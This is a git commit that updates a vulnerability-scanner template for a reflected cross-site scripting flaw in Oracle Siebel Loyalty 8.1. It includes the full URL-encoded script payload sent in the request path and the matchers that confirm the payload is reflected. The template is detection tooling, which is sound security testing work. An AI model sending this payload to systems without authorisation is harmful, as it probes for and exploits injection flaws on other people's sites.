Update oracle-siebel-xss.yaml

patch-1
Prince Chaddha 2021-08-16 14:12:49 +05:30 committed by GitHub
parent cceb32a88b
commit 610924d55b
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 10 additions and 4 deletions

View File

@ -1,22 +1,28 @@
id: oracle-siebel-xss
info:
name: Oracle Siebel XSS
name: Oracle Siebel Loyalty 8.1 - XSS Vulnerability
author: dhiyaneshDK
severity: medium
reference: https://packetstormsecurity.com/files/86721/Oracle-Siebel-Loyalty-8.1-Cross-Site-Scripting.html
tags: xss
tags: xss,oracle
requests:
- method: GET
path:
- '{{BaseURL}}/loyalty_enu/start.swe/%3E%22%3E%3Cscript%3Ealert("XSS")%3C/script%3E'
- '{{BaseURL}}/loyalty_enu/start.swe/%3E%22%3E%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- 'XSS'
- '</script><script>alert(document.domain)</script>'
- type: word
part: header
words:
- text/html
- type: status
status:
- 200